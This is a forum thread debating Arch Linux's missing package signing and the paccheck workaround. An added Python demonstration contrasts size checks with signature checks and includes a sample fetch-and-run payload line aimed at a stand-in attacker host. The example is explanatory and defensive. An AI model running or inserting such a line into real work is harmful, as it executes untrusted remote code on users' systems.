Arch Obsession?

zokudu

Diamond Member
Nov 11, 2009
Maybe it's just the circles I run around in, but outside of the ATOT Linux forum everyone I know who has any little knowledge of Linux seems to think Arch Linux is the best distro since sliced bread and every other distro is worthless. Arch is best at everything for them.

Am I missing something? Doesn't Arch have a HUGE security flaw related to unsigned packages? Am I just running into closed minded people?

EDIT: Could have sworn this was in the Linux forums I'll ask to have it moved.
 
lxskllr

No Lifer
Nov 30, 2004
You're not missing anything. Arch is neat cause it's a roll your own distro that isn't as retarded as Gentoo, but as you noted, it has a critical security flaw due to lack of package signing. I think people just like it cause it isn't as n00b friendly, so they can feel 1337. Just install Debian, and be done with it :^D

Arch does have good documentation, and it's a good resource for other distros too.
 

Khyron320

Senior member
Aug 26, 2002
I think one of the big things about Arch is its release model. Unlike Fedora/Ubuntu, which go with major revs and often don't leave upgrade paths, or close repos after some time, leaving you stranded with no easy way to get updates.

I guess you can get the same thing with Debian Mint.
 

pcgeek11

Lifer
Jun 12, 2005
lxskllr said:
You're not missing anything. Arch is neat cause it's a roll your own distro that isn't as retarded as Gentoo, but as you noted, it has a critical security flaw due to lack of package signing. I think people just like it cause it isn't as n00b friendly, so they can feel 1337. Just install Debian, and be done with it :^D

Arch does have good documentation, and it's a good resource for other distros too.

This...
 

Schadenfroh

Elite Member
Mar 8, 2003
Hmm, I am not familiar with this distro. I like the idea of a rolling release, having the latest versions of packages and the ability to compile each program using CPU specific optimizations.

I do not like the security concerns, though.
 

lxskllr

No Lifer
Nov 30, 2004
Schadenfroh said:
Hmm, I am not familiar with this distro. I like the idea of a rolling release, having the latest versions of packages and the ability to compile each program using CPU specific optimizations.

I do not like the security concerns, though.

I think it's a lot of work for little to no benefit. Debian testing or unstable works as a good rolling release, but compiling your own distro doesn't get you much, other than the satisfaction of doing it. Outside of some specialized applications, it's only useful as a hobby type activity. You may also learn a bit more on what makes Linux tick, but then again, maybe not. I think a lot of people copy scripts and instructions, without really knowing what they're doing.
 

irishScott

Lifer
Oct 10, 2006
lxskllr said:
You're not missing anything. Arch is neat cause it's a roll your own distro that isn't as retarded as Gentoo, but as you noted, it has a critical security flaw due to lack of package signing. I think people just like it cause it isn't as n00b friendly, so they can feel 1337. Just install Debian, and be done with it :^D

Arch does have good documentation, and it's a good resource for other distros too.

The lack of package signing is still an issue, but recently we've received paccheck from a helpful user. Verifies the size of packages across multiple mirrors before download. Arch's been good about updating their repos, so I doubt a synchronization issue due to updates will be much of a problem. This also may be accounted for in the code (checks timestamps?), just skimmed it.

http://aur.archlinux.org/packages.php?ID=46763
 

lxskllr

No Lifer
Nov 30, 2004
irishScott said:
The lack of package signing is still an issue, but recently we've received paccheck from a helpful user. Verifies the size of packages across multiple mirrors before download. Arch's been good about updating their repos, so I doubt a synchronization issue due to updates will be much of a problem. This also may be accounted for in the code (checks timestamps?), just skimmed it.

http://aur.archlinux.org/packages.php?ID=46763
Interesting. Kind of kludgy, but I'd consider that an acceptable workaround for someone interested in Arch.
 

Nothinman

Elite Member
Sep 14, 2001
lxskllr said:
Interesting. Kind of kludgy, but I'd consider that an acceptable workaround for someone interested in Arch.

Yea, that just screams duct tape. And while difficult, it's simpler to make your malicious package have the same size as the original than to match a cryptographically signed package.
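The size-versus-signature point made above, as an added example (not code from the thread, from paccheck or from pacman): a mock client that fetches a package from a mirror and applies either a paccheck-style size check or a signature check, while the attacker pads a swapped-in payload to the original's exact size. Python's standard library has no public-key signing, so the "signature" here is an HMAC-SHA256 under a key the client is assumed to trust (a real package signer uses a public-key scheme); the package bytes, the payload and the key are constructed for the example. The "signed" policy also rejects a package that arrives with no signature at all, which is the behaviour suggested later in the thread for pacman.

```python
"""Why matching a package's size is easy and matching its signature is not.

Added example, not code from the thread, paccheck or pacman. A repository
db entry carries a trusted size and (optionally) a signature; the client
downloads a package from a mirror and decides whether to install it.
"""
import hashlib
import hmac
import os
from typing import Optional

# --- Constructed sample data (not real packages) ---------------------------
GOOD_PKG = b"#!/bin/sh\necho 'installing foo-1.0'\n" + b"\0" * 64
EVIL_PAYLOAD = b"#!/bin/sh\ncurl http://evil.invalid/x | sh\n"

# Hypothetical maintainer signing key that the client trusts. Assumption:
# HMAC stands in for a public-key signature because the stdlib has none.
SIGNING_KEY = os.urandom(32)


def pad_to_size(payload: bytes, size: int) -> bytes:
    """What a mirror attacker does to defeat a size-only check: pad the
    malicious file to the original's length. Trailing NUL bytes after a
    shell script are harmless to the attacker, so the payload still runs."""
    if len(payload) > size:
        raise ValueError("payload larger than target; pick a smaller one")
    return payload + b"\0" * (size - len(payload))


def sign(key: bytes, data: bytes) -> str:
    """Detached signature over the package bytes (HMAC stand-in, see above)."""
    return hmac.new(key, data, hashlib.sha256).hexdigest()


def verify_signature(key: bytes, data: bytes, sig: str) -> bool:
    # Constant-time compare so the check itself leaks nothing useful.
    return hmac.compare_digest(sign(key, data), sig)


def client_accepts(policy: str, trusted_size: int, trusted_sig: Optional[str],
                   downloaded: bytes, key: bytes) -> bool:
    """Decide whether a pacman-like client installs `downloaded`.

    policy "size":   paccheck-style, only the length must match the db entry
    policy "signed": a signature must be present and verify; unsigned => reject
    """
    if policy == "size":
        return len(downloaded) == trusted_size
    if policy == "signed":
        if trusted_sig is None:
            return False  # refuse packages that were never signed
        return verify_signature(key, downloaded, trusted_sig)
    raise ValueError(f"unknown policy {policy!r}")


def demo() -> dict:
    """Run the scenarios the thread argues about; returns outcome by name."""
    good_size = len(GOOD_PKG)
    good_sig = sign(SIGNING_KEY, GOOD_PKG)
    tampered = pad_to_size(EVIL_PAYLOAD, good_size)
    assert len(tampered) == good_size  # attacker matched the size exactly

    return {
        "size_check_accepts_genuine":
            client_accepts("size", good_size, None, GOOD_PKG, SIGNING_KEY),
        "size_check_accepts_tampered":
            client_accepts("size", good_size, None, tampered, SIGNING_KEY),
        "sig_check_accepts_genuine":
            client_accepts("signed", good_size, good_sig, GOOD_PKG, SIGNING_KEY),
        "sig_check_accepts_tampered":
            client_accepts("signed", good_size, good_sig, tampered, SIGNING_KEY),
        "sig_policy_accepts_unsigned":
            client_accepts("signed", good_size, None, GOOD_PKG, SIGNING_KEY),
    }


if __name__ == "__main__":
    for name, ok in demo().items():
        print(f"{name:30s} {'ACCEPT' if ok else 'REJECT'}")
```

Running it shows the size check accepting both the genuine and the padded malicious package, while the signature check accepts only the genuine one and refuses anything unsigned. Comparing sizes across several mirrors, as paccheck does, only helps if the attacker controls one mirror and did not bother to pad; it does nothing against a padded payload or a compromised upstream.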
 

jhu

Lifer
Oct 10, 1999
I just use Debian and compile CPU intensive programs separately (i.e. Povray).
 

irishScott

Lifer
Oct 10, 2006
Nothinman said:
Yea, that just screams duct tape. And while difficult, it's simpler to make your malicious package have the same size as the original than to match a cryptographically signed package.

It is just duct tape. Actual package signing is in the works, if slowly, largely due to more users bitching about it than contributing code.

A nice blog post by the lead developer of pacman (Arch's package manager) spells out the situation nicely: http://www.toofishes.net/blog/real-story-behind-arch-linux-package-signing/
 
Nothinman

Elite Member
Sep 14, 2001
irishScott said:
It is just duct tape. Actual package signing is in the works, if slowly, largely due to more users bitching about it than contributing code.

A nice blog post by the lead developer of pacman (Arch's package manager) spells out the situation nicely: http://www.toofishes.net/blog/real-story-behind-arch-linux-package-signing/

All that spells out for me is that I now know that I'll never install Arch. The whole post is just him crying about others not doing the work for him when in reality, package signing should be a base function of a package manager in this day and age. Essentially it's been documented as a bug for 5 years now, they've had multiple patches submitted that take care of some, but not all, of the work and yet haven't been able to find time to fill in the gaps. He knew what he was getting into when he volunteered to become the lead developer of pacman, whether he's being paid or not is totally irrelevant.

This quote pretty much spells the whole thing out:

As I said, it really does not affect me. I use the master server for my repo db downloads and know exactly which package updates to expect given I see all commits to our svn repos. So the scope in which I could be attacked is very small and I am prepared to take that risk. So my priorities are clearly different to other peoples. The key difference is, I submit patches to implement what I consider a priority...

They don't give a shit because they follow the development so closely and they don't give a shit about users without that insight.
 

irishScott

Lifer
Oct 10, 2006
Nothinman said:
All that spells out for me is that I now know that I'll never install Arch. The whole post is just him crying about others not doing the work for him when in reality, package signing should be a base function of a package manager in this day and age. Essentially it's been documented as a bug for 5 years now, they've had multiple patches submitted that take care of some, but not all, of the work and yet haven't been able to find time to fill in the gaps. He knew what he was getting into when he volunteered to become the lead developer of pacman, whether he's being paid or not is totally irrelevant.

This quote pretty much spells the whole thing out:

They don't give a shit because they follow the development so closely and they don't give a shit about users without that insight.

And all I ever read in your posts is negativity. Frankly I don't care if you ever use Arch Linux or not. There are hundreds of distros out there, glad you're happy (or found your point of least negativity) with Debian.

In any case, he's doing this as a hobby. He's in it for himself, not the users. If it stops being fun, he loses his motivation. If it takes too much time away from his personal life, he loses his motivation. He doesn't make the distro his life. Likewise this attitude is reflected in the structure of Arch. There is no centralized development team per se, no fixed release cycle, just a bunch of contributors who come and go with a few regulars and individual Trusted Users who take care of individual or groups of packages they choose to promote.

If not being professional about a hobby is a crime, your life must suck.

Arch was never intended to be a professional or corporate distro. It's a framework for individual, geeky users who like to customize the crap out of their systems without the complications of compiling. If you see something you don't like, you're supposed to fix it yourself somehow or other. It's your system. When users of the variety described by lxskllr come along they expect support that was never intended to be there, so they bitch. If half of the users bitching contributed we'd have package signing by now.

And frankly once I learn a little more about it I might very well contribute the appropriate patches myself depending on how much free time I have with classes next semester.
 
lxskllr

No Lifer
Nov 30, 2004
I can appreciate Arch's approach of fixing things yourself, and the devs' frustration with people not submitting code, but my biggest problem is they seem to want to brush the issue under the table. Public mailing lists are great and everything, but imo, the issue should be listed on the site. Hell, put a warning up in bold font at the top. That, along with an appeal for help, might get things going quicker.

The lack of package signing was new to a lot of people. That tells me that it wasn't as common knowledge as they'd lead you to believe. Covering up critical defects isn't cool, and it puts people at risk, without giving them the knowledge to make a choice.
 

irishScott

Lifer
Oct 10, 2006
lxskllr said:
I can appreciate Arch's approach of fixing things yourself, and the devs' frustration with people not submitting code, but my biggest problem is they seem to want to brush the issue under the table. Public mailing lists are great and everything, but imo, the issue should be listed on the site. Hell, put a warning up in bold font at the top. That, along with an appeal for help, might get things going quicker.

The lack of package signing was new to a lot of people. That tells me that it wasn't as common knowledge as they'd lead you to believe. Covering up critical defects isn't cool, and it puts people at risk, without giving them the knowledge to make a choice.

I see it more as they simply don't see it as a priority. Read a few threads in the Arch forums about it and the general, final opinion seems to be the same logic as to why most Mac users have no antivirus. There simply aren't any real threats in the wild. Considering Arch Linux has a minuscule amount of market share, along with its individual nature, the logic is someone would have to specifically target an Arch user with a hack complex enough to corrupt the specific repository that specific user is using. There currently aren't enough Arch users to justify that complex an effort for a mass attack for, say, personal info. Much easier and more profitable to just run a phishing scam, among other things.

Meanwhile, given its nature and market share, most corporations or private business users would choose distros known to be secure out of the box, not roll-your-own distros like arch.

If there ever was a corrupted repo of some sort, or if/when arch gets MUCH larger I can see the leadership changing and the distro becoming more professional. Given that arch is currently growing in popularity, that may very well happen. In the meantime arch has gotten along fine with unsigned packages, and the general attitude is if the users want it, the users should code it.
 
lxskllr

No Lifer
Nov 30, 2004
I dunno. Arch is in the unusual position of being small enough, with an attack vector specific enough, that I could see someone doing it just cause they can. Organized crime may not be interested, but an old school hacker with a bent for mayhem might be game.
 

irishScott

Lifer
Oct 10, 2006
lxskllr said:
I dunno. Arch is in the unusual position of being small enough, with an attack vector specific enough, that I could see someone doing it just cause they can. Organized crime may not be interested, but an old school hacker with a bent for mayhem might be game.

Perhaps, but ignorantGuru seems to be the most fired up about it. I'm surprised he never exploited it just to make a point. Maybe he tried.

But then again there's always the repo's own security in the way, unless said hacker knows an Arch user and can intercept the repo-user link somehow.

In any case, package signing will get to arch eventually. In the meantime everything's running pretty smooth, and pacchecker supplies at least some verification for those that use it.
 

Nothinman

Elite Member
Sep 14, 2001
irishScott said:
In any case, he's doing this as a hobby. He's in it for himself, not the users. If it stops being fun, he loses his motivation. If it takes too much time away from his personal life, he loses his motivation. He doesn't make the distro his life. Likewise this attitude is reflected in the structure of Arch. There is no centralized development team per se, no fixed release cycle, just a bunch of contributors who come and go with a few regulars and individual Trusted Users who take care of individual or groups of packages they choose to promote.

Then they should have a big fat warning that says they don't give a shit about their users and that anyone with any common sense should move on...

irishScott said:
If not being professional about a hobby is a crime, your life must suck.

It's not a crime, but if I were developing software that managed other people's data and could have a profound effect on their lives I would care about the security behind my software. These guys obviously don't care.

irishScott said:
Arch was never intended to be a professional or corporate distro. It's a framework for individual, geeky users who like to customize the crap out of their systems without the complications of compiling. If you see something you don't like, you're supposed to fix it yourself somehow or other. It's your system. When users of the variety described by lxskllr come along they expect support that was never intended to be there, so they bitch. If half of the users bitching contributed we'd have package signing by now.

And frankly once I learn a little more about it I might very well contribute the appropriate patches myself depending on how much free time I have with classes next semester.

That's all well and good, I'm all for responsibility of the user but this isn't something that each user can be expected to fix or work around themselves. It's a core function of the system that requires intimate knowledge of the system and its package format. You can't expect users to add their own security hacks on top of it, the fix for this has to be done in the package manager and should've happened years ago.

irishScott said:
I see it more as they simply don't see it as a priority. Read a few threads in the Arch forums about it and the general, final opinion seems to be the same logic as to why most Mac users have no antivirus. There simply aren't any real threats in the wild. Considering Arch Linux has a minuscule amount of market share, along with its individual nature, the logic is someone would have to specifically target an Arch user with a hack complex enough to corrupt the specific repository that specific user is using. There currently aren't enough Arch users to justify that complex an effort for a mass attack for, say, personal info. Much easier and more profitable to just run a phishing scam, among other things.

Apple recently became a target of fake A/V malware. As they just learned, it happens before you realize that it should. You can't rely on your small community as a defense, with even minuscule growth rates everything becomes "big enough" eventually and that milestone isn't even your choice. You don't get to say "Ok, with our current growth rates, we'll be a viable target of blackhats in about 17 months...", it just happens one day.
 

irishScott

Lifer
Oct 10, 2006
Nothinman said:
Then they should have a big fat warning that says they don't give a shit about their users and that anyone with any common sense should move on...

Nothinman said:
It's not a crime, but if I were developing software that managed other people's data and could have a profound effect on their lives I would care about the security behind my software. These guys obviously don't care.

Nothinman said:
That's all well and good, I'm all for responsibility of the user but this isn't something that each user can be expected to fix or work around themselves. It's a core function of the system that requires intimate knowledge of the system and its package format. You can't expect users to add their own security hacks on top of it, the fix for this has to be done in the package manager and should've happened years ago.

Nothinman said:
Apple recently became a target of fake A/V malware. As they just learned, it happens before you realize that it should. You can't rely on your small community as a defense, with even minuscule growth rates everything becomes "big enough" eventually and that milestone isn't even your choice. You don't get to say "Ok, with our current growth rates, we'll be a viable target of blackhats in about 17 months...", it just happens one day.

Mostly true. I'd say the source code is readily available and the developers/forums are pretty friendly. Maybe Dan McGee should be replaced as lead developer for pacman. But he hasn't been, and despite the complaints no one else has come forward to do so. I'm not saying arch is perfect or that it shouldn't change, just that I understand why it is where it is with regard to this issue and have no real problem with it given the circumstances. It's also not a reason to demonize arch by any means.

As for users' responsibility, anyone can submit patches for review to the devs. If they're not intimate with Arch, then the documentation and human resources are there to get them intimate. Instead most have chosen to bitch about how one dev, who's doing this as a hobby, isn't taking care of them properly. Not that I agree with Dan's attitude, but I understand it.

IMO Arch is just growing. It started off as a distribution by a niche of 1337 geeks for a niche of 1337 geeks, in their spare time. Now it's grown to the point where it's attracting non-1337 geeks expecting support that was never in the original formula. Contrast to Ubuntu, which was a professional operation from the get-go with user support a primary objective. Arch will most likely change, but given its origins it makes sense that change will take some time.

As for a warning, hell it's spelled out in Arch's mission statement:
https://wiki.archlinux.org/index.php/The_Arch_Way

User-centric

Whereas many GNU/Linux distributions attempt to be more user-friendly, Arch Linux has always been, and will always remain user-centric.

Arch Linux targets and accommodates competent GNU/Linux users by giving them complete control and responsibility over the system.

Arch Linux users fully manage the system on their own. The system itself will offer little assistance, except for a simple set of maintenance tools that are designed to perfectly relay the user's commands to the system. Arch developers do not expend energy re-inventing GUI system tools; Arch is founded upon sensible design and excellent documentation.

This user-centric design necessarily implies a certain "do-it-yourself" approach to using the Arch distribution. Rather than pursuing assistance or requesting a new feature to be implemented by developers, Arch Linux users have a tendency to solve problems themselves and share the results with the community and development team – a "do first, then ask" philosophy. This is especially true for user-contributed packages found in the Arch User Repository – the official Arch Linux repository for community-maintained packages.
 
sourceninja

Diamond Member
Mar 8, 2005
If the guy managing the packaging system doesn't create the signing system, how do you get all the maintainers on board with actually signing their packages? I'm sure I could hack in signature checking in no time, but getting them to sign their packages seems like an impossible cause if they don't want to do it.
 

Nothinman

Elite Member
Sep 14, 2001
irishScott said:
Mostly true. I'd say the source code is readily available and the developers/forums are pretty friendly. Maybe Dan McGee should be replaced as lead developer for pacman. But he hasn't been, and despite the complaints no one else has come forward to do so. I'm not saying arch is perfect or that it shouldn't change, just that I understand why it is where it is with regard to this issue and have no real problem with it given the circumstances. It's also not a reason to demonize arch by any means.

But it is a reason to demonize them, just as if they told everyone to use telnet because they didn't feel the need to support OpenSSH. Package signing is a basic security feature that people just expect to be there these days.

irishScott said:
As for users' responsibility, anyone can submit patches for review to the devs. If they're not intimate with Arch, then the documentation and human resources are there to get them intimate. Instead most have chosen to bitch about how one dev, who's doing this as a hobby, isn't taking care of them properly. Not that I agree with Dan's attitude, but I understand it.

Not just intimate with Arch, but with the pacman source too which is what would take the most time. And there's the fact that most people can't actually program even if they're comfortable using Linux.

irishScott said:
IMO Arch is just growing. It started off as a distribution by a niche of 1337 geeks for a niche of 1337 geeks, in their spare time. Now it's grown to the point where it's attracting non-1337 geeks expecting support that was never in the original formula. Contrast to Ubuntu, which was a professional operation from the get-go with user support a primary objective. Arch will most likely change, but given its origins it makes sense that change will take some time.

But Ubuntu started as a fork of Debian, which was and still is NFP but still actually cares about their users even though most of the devs aren't involved with any of the official support options.

irishScott said:
As for a warning, hell it's spelled out in Arch's mission statement:
https://wiki.archlinux.org/index.php/The_Arch_Way

I don't see in there where it says that the base system is built with fairly large security holes and that no one should use the system unless they're prepared to deal with them.
 

irishScott

Lifer
Oct 10, 2006
sourceninja said:
If the guy managing the packaging system doesn't create the signing system, how do you get all the maintainers on board with actually signing their packages? I'm sure I could hack in signature checking in no time, but getting them to sign their packages seems like an impossible cause if they don't want to do it.

From what I can gather most of the big names (including those that oversee the package databases) are on board with the idea. It should be Dan McGee's job to implement though, most of the others are taking care of their own duties.

At the very least, you can make a big announcement about package signing and then have pacman bitch for verification if it's told to download an unsigned package. Everyone will go "ZOMG I'm being hacked!" and the maintainer of said package will be lynched until he starts signing.
 
irishScott

Lifer
Oct 10, 2006
Nothinman said:
But it is a reason to demonize them, just as if they told everyone to use telnet because they didn't feel the need to support OpenSSH. Package signing is a basic security feature that people just expect to be there these days.

Nothinman said:
Not just intimate with Arch, but with the pacman source too which is what would take the most time. And there's the fact that most people can't actually program even if they're comfortable using Linux.

Nothinman said:
But Ubuntu started as a fork of Debian, which was and still is NFP but still actually cares about their users even though most of the devs aren't involved with any of the official support options.

Nothinman said:
I don't see in there where it says that the base system is built with fairly large security holes and that no one should use the system unless they're prepared to deal with them.

Say a bunch of software engineers develop a distribution for themselves, and only for themselves, as a hobby. Then they publish it on the internet in the hope of attracting other software engineers to improve it. The distro is good in many ways and attracts non-software engineers, which was never its intention. Do you really expect the original team to accommodate them when that was never their intention? It's like expecting someone driving a mostly empty bus to pick up, feed, and transport every hitch hiker they see to each individual destination just because they have the room.

The pacman source code is available as well. And I think the original attitude was that this was a distro for coders. Hence the user-centric bit. Not that this should or shouldn't change, but that's where it's coming from.

The issue isn't Arch's devs as a whole, most are doing their jobs just fine. Dan's being a little selfish, but given this is his hobby I can understand that. Like I said a lot of people have had the stones to bitch, but none to replace him. He's all we've got for the time being. As for the community, despite what "The Arch Way" says it is very helpful. The forums are dedicated to Arch with no off-topic sections, making most responses informative at the least. Hell, the verification question is entering an obscure, ass-backwards terminal command and supplying the 40-60 character string it produces. There have been threads of noobs on other forums just trying to figure IT out. Not difficult in reality, even for a noob, but shows the kind of person they want to attract.

And nowhere is Arch really advertising itself. It doesn't even mention security on its front page, or its mission statement. It was built as a hobbyist distro. I'm not saying that excuses security holes, but it explains why they're there. My attitude, in traditional Arch form, is "alright, I've been itching for a meaningful project for a while anyway. Why not this?" So as a coder I'll get intimate with pacman/other related packages and see what I can do. At the very least I should be able to make some helpful suggestions to speed things along.

And just to clarify, aside from the package signing issue, arch is as secure as you make it. You mention holes plural, but I've never heard of any others.
 